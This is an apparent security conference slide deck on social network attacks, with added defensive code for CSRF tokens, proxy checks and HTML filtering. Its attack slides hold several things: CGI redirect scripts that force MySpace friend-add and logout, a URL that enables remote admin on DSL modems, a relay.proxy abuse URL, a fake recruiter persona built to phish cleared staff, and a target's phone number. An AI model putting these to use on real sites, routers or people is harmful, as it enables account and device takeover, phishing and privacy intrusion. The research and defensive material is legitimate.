Who are these idiots?

- Senior Consultant - Idea Information Security
- Associate Professor at UAT
- Founder / Hexagon Security
- Facebook, LinkedIn, Twitter, MySpace

- Senior Consultant - FishNet Security
- Douchebag with Microphone
- Sockpuppet herder and malcontent
- Facebook, LinkedIn, Twitter, hates MySpace
#include std_disclaimer.h

No animals, bloggers, journalists or camwhores were harmed during these demonstrations. While actual SocNet sites and users were involved, all payloads were benign and only resulted in wounded pride and possibly high blood pressure.

We are not experts and should not be trusted in any way. Always ask your doctor before changing prescriptions or viewing LiveJournal session captures.

No specific Social Network is intended as the sole object of ridicule, and the problems here are universal.

There is much fail to be found, and much as of yet unfound.

For reals, yo.
WTF is this about?

- Our obsession with SocNets, mostly.
- Impromptu threat modeling over ${drinks}.
- Various (harmless) sorties on SocNet sites.
- SocEng experiments and silliness.
- Is / Was this 0day?
  - No, at least we don't think so...
  - "Featurebilities". Design flaws. Architecture FAIL.
  - They put it there... On purpose! Srsly!
  - Still, lots of soft, squishy attack surface
WTF is this about?

- SocNets as attack platform
  - Millions of users = targets
  - Business model: Ads, user-generated content
- Vuln Mashups 2.0
  - Promiscuous and pervasive trust
  - SocEng + vulns = attacker ROI
- App threats (OpenSocial, FB)
  - Attacking clients with apps
  - Attacking apps with apps
  - SocNet as lightweight Botnet
Offsite Content = Fuxor

- Link to crap offsite = epic fail
  - IMG tag CSRF
  - CSS / JScript hijacking, click fraud, SocNet as botnet
  - Hello, SocNets. Plz fix. kthxbye.
  - MySpace, Hi5, LiveJournal, many others.
- Request Conversions (SSRF)
  - POST to GET
  - Sometimes enforced / validated differently based on method
  - We don't need XMLHTTP kung fu for GET-based CSRF
Meet Alice, Bob, and Eva
import cgi

# Python 2 CGI script from the slide: it answers with a 307 so that whatever fetched it
# (an <img> tag on a profile, say) is sent on to the victim URL with the browser's cookies.
def print_redirect(url):
    print 'Status: 307 Temporary Redirect'
    print 'Location:', url
    print 'Pragma: no-cache'
    print 'Content-Type: text/html'
    print                       # blank line that ends the CGI headers
    print '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML//EN">'
    # the query string after index.htm on the original slide is unreadable in the scan
    print '<head><meta http-equiv="refresh" content="0;url=index.htm" /></head>'
    print '<title>307 Temporary Redirect</title>'
    print '<h1>307 Temporary Redirect</h1>'
    print '<p>Redirected'
    hurl = cgi.escape(url, 1)   # quote=1 also escapes double quotes for the href
    print '<a href="%s">%s</a>.' % (hurl, hurl)

# On the slide, victimsite is a MySpace "Add to Friends" request (index.cfm?fuseaction=...)
# with the form's __EVENTTARGET, __EVENTARGUMENT and __VIEWSTATE fields carried in the
# query string; the multi-kilobyte __VIEWSTATE value is unreadable in the scan.
victimsite = "http://<unreadable>.myspace.com/index.cfm?fuseaction=<unreadable>"
print_redirect(victimsite)
External Content = Fuxor

Innocuous Functions

- Most sites protect functions that appear valuable
  - Account changes, messaging, profile admin
  - Computationally expensive overhead
  - Tokenized
- Things that don't appear valuable
  - Logging out
  - Blocking communications
  - Lots of other stuff
#!/usr/bin/env python
import cgi

# Python 2 CGI script from the slide: any GET that reaches it is bounced with a 307 to the
# victim URL, so a browser that loaded it as an image logs the user out of MySpace.
def print_redirect(url):
    print 'Status: 307 Temporary Redirect'
    print 'Location:', url
    print 'Pragma: no-cache'
    print 'Content-Type: text/html'
    print                       # blank line that ends the CGI headers
    print '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML//EN">'
    # the query string after index.htm on the original slide is unreadable in the scan
    print '<head><meta http-equiv="refresh" content="0;url=index.htm" /></head>'
    print '<title>307 Temporary Redirect</title>'
    print '<h1>307 Temporary Redirect</h1>'
    print '<p>Redirected'
    hurl = cgi.escape(url, 1)   # quote=1 also escapes double quotes for the href
    print '<a href="%s">%s</a>.' % (hurl, hurl)

victimsite = "http://collect.myspace.com/index.cfm?fuseaction=signout"
print_redirect(victimsite)
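The two redirect scripts above work because logout is treated as an "innocuous" function that gets no token, and because the valuable functions are often tokenized only on POST, so the same handler answering a GET walks around the check. The following added example (not from the slides or the authors; the host name, server secret and request records are constructed) puts that weak pattern beside a hardened one: a per-session HMAC token checked on every state-changing action, logout included, plus a POST-only rule and a same-site Origin/Referer check, so the GET that an <img> tag or a 307 redirect produces is refused.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Constructed values: the site's own host and a server-side secret for deriving tokens.
SITE_HOST = "socnet.example"
SERVER_SECRET = b"constructed-server-secret-rotate-me"


def csrf_token(session_id):
    """Per-session CSRF token derived with HMAC, so it needs no server-side storage."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def make_request(method, form=None, headers=None, session="session-1"):
    """Minimal request record (constructed stand-in for a real framework object)."""
    return {"method": method, "form": form or {}, "headers": headers or {}, "session": session}


# --- The weak pattern the slides describe --------------------------------------

def weak_logout(req):
    """Logout looks worthless, so it gets no token at all: any GET, including the one
    an <img> tag or a 307 redirect produces, ends the session."""
    return "logged_out"


def weak_change_email(req):
    """"Valuable" function: tokenized, but only on POST. The same handler answers GET
    too, so converting the POST to a GET walks around the check."""
    if req["method"] == "POST":
        if not hmac.compare_digest(req["form"].get("csrf", ""), csrf_token(req["session"])):
            return "rejected"
    return "email_changed"


# --- Hardened pattern ----------------------------------------------------------

def _same_site_source(req):
    """Origin (or Referer as a fallback) must name our own host; a missing header is
    treated as cross-site, since state changes never come from a bare navigation."""
    source = req["headers"].get("Origin") or req["headers"].get("Referer")
    return source is not None and urlsplit(source).hostname == SITE_HOST


def guarded(handler):
    """Wrap any state-changing action, logout included: POST only, same-site source,
    valid per-session token. Cheap enough that "expensive overhead" is no excuse."""
    def wrapper(req):
        if req["method"] != "POST":
            return "rejected"
        if not _same_site_source(req):
            return "rejected"
        if not hmac.compare_digest(req["form"].get("csrf", ""), csrf_token(req["session"])):
            return "rejected"
        return handler(req)
    return wrapper


safe_logout = guarded(lambda req: "logged_out")
safe_change_email = guarded(lambda req: "email_changed")


# Constructed requests: the GET an <img src=...> on an offsite page produces, a
# legitimate same-site POST, and a cross-site POST that somehow carries the token.
IMG_TAG_GET = make_request("GET", headers={"Referer": "http://offsite.example/page.html"})
LEGIT_POST = make_request("POST", form={"csrf": csrf_token("session-1")},
                          headers={"Origin": "http://socnet.example"})
OFFSITE_POST = make_request("POST", form={"csrf": csrf_token("session-1")},
                            headers={"Origin": "http://offsite.example"})


def demo():
    """Outcome of each handler for each request, as a dict for inspection."""
    return {
        "weak_logout_img_get": weak_logout(IMG_TAG_GET),
        "weak_email_img_get": weak_change_email(IMG_TAG_GET),
        "safe_logout_img_get": safe_logout(IMG_TAG_GET),
        "safe_email_offsite_post": safe_change_email(OFFSITE_POST),
        "safe_logout_legit_post": safe_logout(LEGIT_POST),
        "safe_email_legit_post": safe_change_email(LEGIT_POST),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print("%-26s %s" % (name, outcome))
```

The token check alone would already stop the redirect trick; the POST-only and same-site rules are there because a handler that ever answers a GET will eventually be reached by one, and because the token check must apply uniformly, not only to the functions that look valuable.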
MySpace DoS

[Screenshot: browser address bar at http://home.myspace.com/index.cfm?fuseaction=user; the rest of the page is unreadable in the scan]
No JavaScript No Prob

There may be other ways ;)

- <img src="http://domain.com/redirected_image">
- <meta http-equiv="refresh" content="0;url=http://domain.com/whatever">
- <iframe src="http://domain.com/whatever"></iframe>
Local Net Ownage

- AT&T's DSL Modems (Motorola / Netopia)
- One request and you are remote admin :)
- Home LAN pwnage from visiting a MySpace Page
- http://www.neohaxor.org/2008/12/01/csrf-vulns-on-local-network-devices/
- http://192.168.1.254:80/Forms/remoteRES_1?NSS_RemotePassword=blehblah&NSS_EnableWANAdminAccessRES=on&timeoutDisable=0&Enable=Enable

[Screenshot: browser at http://192.168.1.254/; page content unreadable in the scan]
Logic Attacks on SocNets

- Attacks don't always have to be so straightforward
- Extremely difficult to identify through automated testing.
- AdultFriendFinder privilege escalation
  - It's a SocNet, right? We think so!
  - Allows for the viewing of paid-for content
Elite AFF pwnage. Ph33r.

[Screenshot: AdultFriendFinder profile pages; text unreadable in the scan]

We did you a favor. Srsly.
SocNet SocEng

- SocEng = low line noise, high hit rate
- Great ROI for a targeted attack.
- Diamond-tipped spearphishing. =)
- Build a plausible profile
  - Public sources, company data
  - Get "respectable" # of connections
- And then what, pray tell?
  - We just built friends / connections
  - Real attack: mail / msg custom payload
The Marcus Experiment

Marcus was concerned about SocNets. He agreed to help us out.

The Marcus Experiment

The end result
- 50+ connections in less than 24 hours
- CSOs, bigwigs, CISSPs, feds, ISSA ppl, and my personal favorite...

[Screenshot, unreadable in the scan]
Say Hello to Amber.

[Screenshot: browser window titled "LinkedIn: Amber Norton - Mozilla Firefox"]

Seeking Penetration?

[Screenshot, unreadable in the scan]
Group?

[Screenshot: LinkedIn group "Security Clearance Jobs" (My Groups | Groups Directory | Create a Group | FAQ; Updates, Members, Settings; Discussion; Group Profile; Go back to all Discussions | < Previous | Next >)]

Amber Norton
Senior Technical Recruiter, Federal Practice
See all Amber's discussions

Seeking IT Security and Penetration

I'm currently trying to fill a number of contract positions for a Federal client looking for "penetration experts" or "ethical hackers", with a strong preference for candidates who currently hold an active TS/SCI. The positions are "virtual" and can be anywhere in the US (expect around 25% travel), and pay ranges seem to be in line with what my research shows is fair, a little over 100K USD with benefits, higher as an hourly rate on 1099 or corp-to-corp if you can obtain your own benefits. These contract positions can be 1099, W-2, corp-to-corp; I can do whatever works for you. This is supporting a two year contract, and I'd like to see contract terms from candidates of anywhere from 6 months to a year. Some skillset keywords I'm looking for in candidate resumes: Nessus, Nmap, Firewalk, Snort, CEH, CANVAS, Core Impact, Metasploit, AppScan, WebInspect. I'm also looking for other general security practitioners who currently hold a TS/SCI. Contact me for details!

You have 14 minutes to make changes | Edit Discussion | Delete discussion
Amber Wins.

- The end result:
  - 50+ cleared / defense connections
  - CISO of $TLA (Ssssshhh...)
  - Wow, lots of BAH people.
  - My favorite:

[Screenshot: LinkedIn invitation]

From: Bob Krangle
Date: February 5, 2009
To: Amber Norton
Status: Pending

You and Bob Krangle share a network or group

I have an interim C6 clearance - is that good?

Bob Krangle
972-4S9-35C8
DM fail

- Alex leaves lenscap on

[Screenshot: Twitter timeline]

alexsotirov: ..the situation. It's quite complicated. I'm about to fly to SFO, landing at 9pm. You can reach me at [phone number, unreadable in the scan] after that.
about 2 hours ago - Reply - View Tweet

alexsotirov: Everybody who saw the tweet with my phone number before I deleted it, call me if you're bored :-) It was supposed to be a direct message.
about 2 hours ago - Reply - View Tweet
Fresh Fail from Green Zone

[Screenshot: tweet]

petehoekstra (Pete Hoekstra): Just landed in Baghdad. I believe it may be first time I've had bb service in Iraq. 11th trip here.
about 24 hours ago from TwitterBerry

[Conference logo, text unreadable in the scan]

Monday, February 9, 2009

OpenSocial Apps

Your bling just bit you in the ass, douchebag.
User Installed Nunchaku

- Who needs vulns?
  - Convenient APIs, 100% arbitrary code
  - OpenSocial: "Write once, Own anywhere."(tm)
  - Pick a meme, get installs... Then "go rogue".
  - Your own personal botnet, for a few lines of PHP.
- SocNet sites DON'T CARE. Period.
  - EULA and separate domain = zero responsibility
  - Arbitrary execution on most sites
  - Little to no validation (vetting process, # friends)
  - Any app can attack another app (same domain)

Let's Fighting Love
Origin Shmorigin

- What about same origin?
  - What are you attacking? Site, or user?
- API functions allow you to proxy requests
  - Comes from server, not client though ;)
  - GETs
  - POSTs
- Depends on the attacker and goal.
  - Are you targeting the site itself?
  - Can still hit many clients via apps
  - We can also CSRF via simple GETs w/o XSS
Proof and Pudding

[Screenshot: MySpace profile page (Nathan - 31 - Male - JACKSONVILLE, Florida) with a browser alert: "The page at http://api.msappspace.com says: name=Pants_Secret_Cookie"]

Nathan is in on your network.

Nathan's Blurbs

About me:
I am Nathan, I am a security professional and a professor at a university. I spend most of my time pondering problems of the world and trying to work solutions for them. I have been involved with art and music most of my life as well.

Who I'd like to meet:
All of the members of the A-Team.
Are you down with the Hex?
More relay.proxy :)

- Used to access cross-domain content
  - Anonymous calls can be made to it
  - Appears to be doing content filtering now
  - LinkedIn does it too! Part of the OpenSocial API
- They changed the opensocial_token from our example at Black Hat
  - All apps have an opensocial_token, just use one of those

http://api.msappspace.com/proxy/relay.proxy?opensocial_token=sMAPei0219jvS7VQaBVWaKTs16cFED5lwyeMNNFEIzQgqBRjBhXM8EugjDvqPIFS8uDoTjHfGEYGe74uvFMCQ/Uu2mTyxAQaILH3w55n3u8=&opensocial_url=http%3A//www.hexsec.com
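relay.proxy is a server-side fetch of a caller-chosen URL, authorised by a token that any app can obtain, so the fetch runs with the social network's own network position rather than the user's. The following added example (not MySpace's, LinkedIn's or the authors' code; the token table, host names and DNS answers are constructed so it runs offline) shows the checks such a cross-domain proxy needs before it fetches anything: the token must belong to a registered app, only http/https on the standard ports is allowed, and every address the host resolves to must be public, which keeps LAN devices like the 192.168.1.254 modem from the Local Net Ownage slide, loopback and link-local ranges out of reach.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}


def is_public_address(ip_text):
    """Reject anything a server-side fetch should never reach: RFC 1918, loopback,
    link-local (169.254.x, cloud metadata), CGNAT, multicast and reserved ranges."""
    ip = ipaddress.ip_address(ip_text)
    return ip.is_global and not ip.is_multicast


def resolve_all(host):
    """Live resolver: every address the name maps to, since a hostile name can
    answer with a mix of public and private addresses."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_proxy_request(token, app_tokens, url, resolver=resolve_all):
    """Decide whether a relay.proxy-style fetch may proceed.

    app_tokens maps each app's opensocial_token to its app id; the token must be
    the calling app's own, not merely any valid token. Returns (allowed, reason)."""
    app = app_tokens.get(token)
    if app is None:
        return False, "unknown or missing opensocial_token"
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    if not parts.hostname:
        return False, "no host in URL"
    try:
        port = parts.port
    except ValueError:
        return False, "bad port"
    if port not in ALLOWED_PORTS:
        return False, "port not allowed: %r" % port
    try:
        addresses = resolver(parts.hostname)
    except (socket.gaierror, ValueError, KeyError):
        return False, "host does not resolve"
    for address in addresses:
        if not is_public_address(address):
            return False, "resolves to non-public address %s" % address
    return True, "ok for app %s" % app


# Constructed fixtures so the check runs offline: two registered apps and a DNS table.
CONSTRUCTED_APP_TOKENS = {"constructed-token-app-a": "app-a", "constructed-token-app-b": "app-b"}
CONSTRUCTED_DNS = {
    "www.hexsec.com": ["198.0.0.5"],              # constructed public address
    "dsl-modem.lan": ["192.168.1.254"],           # the LAN device from the slides
    "mixed.example": ["198.0.0.5", "127.0.0.1"],  # split answer: one public, one loopback
    "192.168.1.254": ["192.168.1.254"],           # literal addresses resolve to themselves
}


def constructed_resolver(host):
    return CONSTRUCTED_DNS[host]  # KeyError for unknown names, handled by the caller


if __name__ == "__main__":
    for url in ("http://www.hexsec.com/", "http://dsl-modem.lan/", "http://mixed.example/",
                "http://192.168.1.254:80/", "file:///etc/passwd"):
        print(url, check_proxy_request("constructed-token-app-a", CONSTRUCTED_APP_TOKENS,
                                       url, constructed_resolver))
```

Two things the check cannot do on its own: the fetch must connect to the address that was checked (resolve once, pin it) rather than resolving again, and any redirect the remote host answers with must go through the same check before it is followed, since a permitted public host can 302 to an internal one. Binding the token to the calling app and session, not just to "some app", is what stops the "just use any opensocial_token" shortcut the slide describes.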
WhatIsMyIP.com

[Screenshot: WhatIsMyIP.com ("The fastest and easiest way to determine your IP address"; menu: IP Address, IP Command Lines, IP Addresses Explained, Speed Test, Automation, What's New) fetched through relay.proxy, reporting "Your IP Address Is 204.16.33.73"]

Relay.Proxy fail.

Dev Apps Enum
Cajoley Caja, Batman!

- Caja is meant to create "safe" JavaScript in OpenSocial
- Tries to un-suckify .js, removing:
  - eval()
  - top.location
  - And many others...
- Demonstrates the way this problem is typically approached anyway.
- Seems irrelevant if it's implemented opt-in.
Fresh fail since Black Hat

- Facebot
- LinkedIn Malware FUD
- CSRF in OAuth
- Facebook 419 Scams
- Facebook XSS
- Twitter admin int / celeb phishing

Banner Attacks

Protection From Apps

- Identify app content
- Blocking iframes
  - Click fraud
  - CSRF
  - Malicious scripts
- Blocking <div> content
  - More of an impact on social experience
  - Protects from the same as above
Firefox Extension

CSRFblocker

CSRFblocker Prefs

[Screenshot: CSRFblocker preferences dialog]

CSRFblocker Functions
- Enable CSRFblocker
- Enable Warnings
- Block All Private Nets 10.x.x.x, 172.16.x.x, 192.168.x.x
- Block Localhost 127.x.x.x

Tag Handling Functions
- Enable Link Removal
- Block IMG tags below height __ px, width __ px
- Block IFRAME tags below height __ px, width __ px

URL List
CSRFblocker Info

- http://www.hexsec.com/labs.html
- Not just for CSRF
  - Block Sites
  - IMG tags and IFRAMEs Oh My!
  - Page and Cookie Isolation
- Future features and brainstorming
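The IMG, meta-refresh and iframe vectors from the No JavaScript No Prob slide, the private-address request from Local Net Ownage, and the private-net, localhost and minimum-size rules CSRFblocker applies in the browser can also be applied on the site side, at the moment user-generated profile HTML is stored. The following added example (not the authors' or CSRFblocker's code; the trusted hosts, the size threshold and the sample profile fragment are constructed) rewrites a profile fragment with the standard-library HTML parser: it drops IMG tags whose src is offsite, a literal non-public address or below the size threshold, drops iframe, meta, script, style, link, object, embed and base tags outright, and re-emits everything else unchanged, escaped text included.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed policy: hosts whose content is first-party, and the pixel size below
# which an IMG is treated as a tracking or CSRF beacon rather than content.
TRUSTED_HOSTS = {"socnet.example", "img.socnet.example"}
MIN_EMBED_PX = 8

# Tags that pull in or redirect to offsite content; content tags are skipped with their body.
DROP_TAGS = {"iframe", "frame", "script", "style", "link", "meta", "object", "embed", "base"}
VOID_TAGS = {"img", "br", "hr", "meta", "link", "input", "source"}


def url_is_offsite_or_private(url):
    """True when a URL points away from our trusted hosts, at a literal non-public
    address (LAN devices, loopback), or uses a scheme other than http(s)/relative."""
    parts = urlsplit(url)
    if parts.scheme not in ("", "http", "https"):
        return True
    host = parts.hostname
    if host is None:
        return False  # relative URL, stays on our own origin
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        pass  # not a literal address
    return host == "localhost" or host not in TRUSTED_HOSTS


def _too_small(attrs):
    """CSRFblocker-style size rule on declared width/height attributes."""
    for dim in ("width", "height"):
        value = (attrs.get(dim) or "").strip().rstrip("px").strip()
        if value.isdigit() and int(value) < MIN_EMBED_PX:
            return True
    return False


class OffsiteStripper(HTMLParser):
    """Re-emits HTML, minus offsite/private/tiny IMG tags and the DROP_TAGS."""

    def __init__(self):
        # convert_charrefs=False so escaped text is re-emitted escaped, never unescaped
        super().__init__(convert_charrefs=False)
        self.out = []
        self.dropped = []
        self._skip = None  # content tag whose body is being discarded

    def handle_starttag(self, tag, attrs):
        if self._skip:
            return
        if tag in DROP_TAGS:
            self.dropped.append(tag)
            if tag not in VOID_TAGS:
                self._skip = tag
            return
        a = dict(attrs)
        if tag == "img" and (url_is_offsite_or_private(a.get("src") or "") or _too_small(a)):
            self.dropped.append(tag)
            return
        self.out.append(self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if self._skip:
            if tag == self._skip:
                self._skip = None
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip:
            self.out.append(data)

    def handle_entityref(self, name):
        if not self._skip:
            self.out.append("&%s;" % name)

    def handle_charref(self, name):
        if not self._skip:
            self.out.append("&#%s;" % name)

    def handle_comment(self, data):
        pass  # comments (including IE conditional comments) are dropped


def strip_offsite_content(html):
    """Return (cleaned_html, list_of_dropped_tag_names)."""
    parser = OffsiteStripper()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed profile fragment: one legitimate image plus the vectors from the slides.
SAMPLE_PROFILE = (
    '<p>About me: I like cats &amp; dogs</p>'
    '<img src="http://img.socnet.example/me.jpg" width="200" height="200">'
    '<img src="http://offsite.example/redirect.cgi" width="1" height="1">'
    '<img src="http://192.168.1.254/">'
    '<meta http-equiv="refresh" content="0;url=http://offsite.example/whatever">'
    '<iframe src="http://offsite.example/whatever"></iframe>'
    '<script src="http://offsite.example/hijack.js"></script>'
    '<a href="http://offsite.example/">my blog</a>'
)

if __name__ == "__main__":
    cleaned, dropped = strip_offsite_content(SAMPLE_PROFILE)
    print(cleaned)
    print("dropped:", dropped)
```

Links are left alone here because an <a> needs a click, while the dropped tags fire on page load; a site that wants CSRFblocker's "Link Removal" behaviour would add "a" to the same offsite test. Host names that resolve to private addresses are only caught when written as literal addresses, which is all a stored-content filter can see; the server-side fetch check is where DNS answers get inspected.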
But what to do?

- Kill external content
- Drastically reduce API functionality
- Threat model your stuff, people
- Props to late adopters. =)
- No opt-in security models
- Developers, Developers, Developers
- Profile lifetime bit (member since / training wheels)
- Email verification for corporate socnets
Any Questions?

We think you are awesome for sitting in this room and not throwing too much crap at us.